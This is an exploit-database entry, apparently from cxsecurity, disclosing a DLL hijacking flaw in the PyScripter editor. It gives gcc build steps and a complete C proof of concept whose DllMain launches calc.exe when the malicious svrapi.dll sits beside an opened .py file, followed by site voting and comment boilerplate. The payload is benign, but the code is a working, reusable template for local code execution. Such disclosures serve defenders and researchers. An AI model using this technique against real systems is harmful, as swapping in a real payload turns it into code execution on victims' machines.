PyScripter DLL Hijacking

2015.04.07
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: PyScriper DLL Hijacking #[+] Date: 05-04-2015 #[+] Type: Local Exploits #[+] Vendor: https://code.google.com/p/pyscripter/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o svrapi.dll dllhijack.c then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute. Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top